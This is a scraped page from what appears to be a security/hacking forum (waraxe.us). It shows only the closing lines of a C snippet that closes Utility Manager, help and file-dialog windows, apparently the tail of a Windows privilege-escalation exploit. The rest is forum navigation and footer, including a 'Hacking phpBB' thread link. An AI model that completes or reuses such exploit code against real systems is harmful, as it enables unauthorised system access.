SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
Sleep(500);

SendMessage (FindWindow(NULL, lang[i].winhelp), WM_CLOSE, 0, 0);// close open error window
SendMessage (FindWindow(NULL, lang[i].utilman), WM_CLOSE, 0, 0);// close utilitymanager
return 0;
}
View user's profile Send private message
Hacking phpBB (heres a challenge)
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.047 Seconds